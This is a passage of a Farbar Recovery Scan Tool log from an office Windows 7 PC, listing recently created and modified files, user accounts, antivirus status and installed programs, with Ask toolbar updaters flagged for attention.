C:\Windows\system32\KernelBase.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) 
C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) 
C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2016-11-09 14:24 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 
2016-11-09 14:24 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) 
C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe 2016-11-09 14:24 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) 
C:\Windows\system32\Drivers\appid.sys
2016-11-09 14:24 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-09 14:24 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-09 14:24 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-09 14:24 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-09 14:24 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-09 14:24 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-09 14:24 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-09 14:24 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-09 14:24 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-09 14:24 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-09 14:24 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-09 14:24 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-09 14:24 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-09 14:24 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-09 14:24 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-09 14:24 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-09 14:24 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-11-09 14:24 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-09 14:23 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-09 11:08 - 2016-12-06 05:53 - 00002271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-09 11:07 - 2016-12-07 05:12 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-09 11:07 - 2016-12-06 16:36 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-09 11:07 - 2016-11-09 11:07 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup.exe
2016-11-09 11:07 - 2016-11-09 11:07 - 00003900 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-11-09 11:07 - 2016-11-09 11:07 - 00003648 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-11-09 11:07 - 2016-11-09 11:07 - 00000000 ____D C:\Program Files (x86)\Google
2016-11-08 16:09 - 2016-12-06 16:34 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2016-11-08 16:08 - 2016-11-08 16:08 - 00000000 ____D C:\Users\Reception\AppData\Local\LogMeIn
2016-11-08 16:08 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2016-11-08 16:08 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2016-11-08 16:08 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2016-11-08 16:08 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak
2016-11-08 16:08 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys
2016-11-08 16:07 - 2016-11-08 16:09 - 00000000 ____D C:\Program Files (x86)\LogMeIn
2016-11-08 15:48 - 2016-11-08 15:48 - 20489480 _____ C:\Users\Reception\Downloads\LogMeIn.exe

==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-07 06:02 - 2013-02-27 07:50 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-07 05:31 - 2014-02-26 12:30 - 00000346 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job
2016-12-07 05:25 - 2011-05-13 16:24 - 00000000 ____D C:\ProgramData\LogMeIn
2016-12-07 05:13 - 2011-05-13 11:48 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl
2016-12-07 04:16 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-07 04:16 - 2009-07-13 23:45 - 00031904 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-06 16:34 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-06 07:47 - 2014-10-23 11:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-06 05:28 - 2011-05-13 11:53 - 00000000 ____D C:\Users\Reception
2016-12-06 05:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-12-06 05:19 - 2011-05-11 13:31 - 00000000 ____D C:\Intel
2016-12-06 02:40 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\L2Schemas
2016-12-06 02:38 - 2016-08-11 09:57 - 00000000 ____D C:\Program Files (x86)\Slimjet
2016-12-06 02:26 - 2014-10-23 11:44 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-12-05 12:13 - 2011-05-13 12:20 - 00000000 ____D C:\Users\clayton
2016-12-05 12:11 - 2016-10-12 09:59 - 00000000 ____D C:\Qoobox
2016-12-05 12:11 - 2016-10-12 09:58 - 00000000 ____D C:\Windows\erdnt
2016-12-05 12:11 - 2013-11-15 10:31 - 00000000 ____D C:\Users\blagler
2016-12-05 12:11 - 2013-08-14 15:57 - 00000000 ____D C:\Program Files (x86)\Print Tracker
2016-12-05 12:11 - 2012-02-24 09:18 - 00000000 ____D C:\Users\dcreery
2016-12-05 12:11 - 2011-05-13 11:45 - 00000000 ____D C:\Users\thepclink
2016-12-05 12:11 - 2010-11-21 02:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\security
2016-12-05 12:11 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration
2016-12-05 12:09 - 2011-05-13 12:23 - 00000000 __RHD C:\MSOCache
2016-12-02 12:08 - 2015-02-11 16:28 - 00000000 ____D C:\Users\Reception\AppData\Local\CrashDumps
2016-11-14 18:12 - 2009-07-14 00:13 - 00782778 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-14 07:53 - 2015-11-11 10:58 - 00000000 ____D C:\Program Files (x86)\Backblaze
2016-11-10 15:36 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-10 13:19 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache
2016-11-10 06:56 - 2009-07-13 23:45 - 01637720 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-09 17:09 - 2013-08-14 02:01 - 00000000 ____D C:\Windows\system32\MRT
2016-11-09 16:57 - 2011-05-11 10:40 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-09 14:39 - 2011-05-16 08:24 - 00000000 ____D C:\Users\Reception\AppData\Local\Google
2016-11-08 20:22 - 2012-01-04 10:02 - 00000000 ____D C:\Windows\Hewlett-Packard
2016-11-08 16:14 - 2014-10-23 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-08 16:09 - 2011-05-13 16:24 - 00001024 _____ C:\.rnd
2016-11-08 10:02 - 2013-02-27 07:50 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-08 10:02 - 2013-02-27 07:50 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-08 10:02 - 2013-02-27 07:50 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-08 10:02 - 2011-07-25 07:38 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-11-08 10:02 - 2011-05-13 16:09 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2014-10-23 15:43 - 2014-10-23 15:43 - 0000272 _____ () C:\Users\Reception\AppData\Roaming\.backup.dm
2011-05-13 16:12 - 2011-05-13 16:12 - 0000697 _____ () C:\Users\Reception\AppData\Roaming\ConvAPIPlugin.log
2015-08-07 13:53 - 2015-08-07 13:53 - 0022544 _____ () C:\Users\Reception\AppData\Roaming\UserTile.png
2014-10-24 13:59 - 2014-10-24 13:59 - 0007643 _____ () C:\Users\Reception\AppData\Local\Resmon.ResmonCfg
2016-11-10 14:24 - 2016-07-14 04:09 - 0010240 _____ () C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp
2016-11-10 14:24 - 2016-07-14 04:09 - 0009216 _____ () C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp
2013-11-11 09:40 - 2013-11-11 09:40 - 0000057 _____ () C:\ProgramData\Ament.ini
2011-05-13 15:07 - 2011-05-13 16:12 - 0003443 _____ () C:\ProgramData\hpzinstall.log

==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-02 04:41

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-12-2016
Ran by Reception (07-12-2016 06:04:23)
Running from \\SPARTA\RedirectedFolders\Reception\Desktop
Windows 7 Professional Service Pack 1 (X64) (2011-05-13 16:44:56)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

admin (S-1-5-21-1158510682-2263174364-945799988-1001 - Administrator - Enabled)
Administrator (S-1-5-21-1158510682-2263174364-945799988-500 - Administrator - Disabled)
Guest (S-1-5-21-1158510682-2263174364-945799988-501 - Limited - Disabled)

==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}

==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
6500_E709_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
7-Zip 16.02 (HKLM-x32\...\7-Zip) (Version: 16.02 - Igor Pavlov)
Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.6 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Reader X (10.1.9) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.9 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{D4B07658-F443-4445-A261-E643996E139D}) (Version: 4.3.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{A6B0442B-E159-444B-B49D-6B9AC531EAE3}) (Version: 4.3.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Ask Toolbar Updater (HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.0.20007 - Ask.com) <==== ATTENTION
Avery Toolbar Updater (HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.6.44892 - Ask.com) <==== ATTENTION
Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
CASIO C781 USB Driver V1.0.4.0 (HKLM-x32\...\{3FA1785D-EED5-4840-A78F-2FC8B663CA86}) (Version: 1.0.4.0 - CASIO)
Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix)
CrystalDiskInfo 7.0.4 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.0.4 - Crystal Dew World)
CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.)
CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden
CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden
DESI Labeling System (HKLM-x32\...\DESI Labeling System 3.8.1.0) (Version: 3.1.10.1 - DESI Telephone Labels, Inc.)
DESI Labeling System (Version: 3.8.1.0 - DESI Telephone Labels, Inc.) Hidden
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
DocMgr (x32 Version: 140.0.65.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.100.000 - Hewlett-Packard) Hidden
Fax (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.49 - FileZilla Project)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 10.0.8.0 - FlashPeak Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.75 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.)
GoToAssist Customer 2.5.0.888 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.5.0.888 - Citrix Online)
GPBaseService2 (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Hewlett-Packard ACLM.NET v1.1.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet 2540 series Basic Device Software (HKLM\...\{BD1EFE20-246B-451F-B900-F1214324DF5F}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.)
HP Deskjet 2540 series Help (HKLM-x32\...\{4539575D-C09D-4E71-B207-0F2D6BD74DA2}) (Version: 30.0.0 - Hewlett Packard)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Officejet 6500 E709 Series (HKLM\...\{58D79E62-CFC8-4331-8469-3A1B16E1769C}) (Version: 14.0 - HP)
HP Officejet Pro 8610 Basic Device Software (HKLM\...\{39DA3F40-0B9E-4002-8E01-108FEC9EFE43}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
HP Officejet Pro 8610 Help (HKLM-x32\...\{F9569D00-4576-46C8-B6C7-207A4FD39745}) (Version: 32.0.0 - Hewlett Packard)
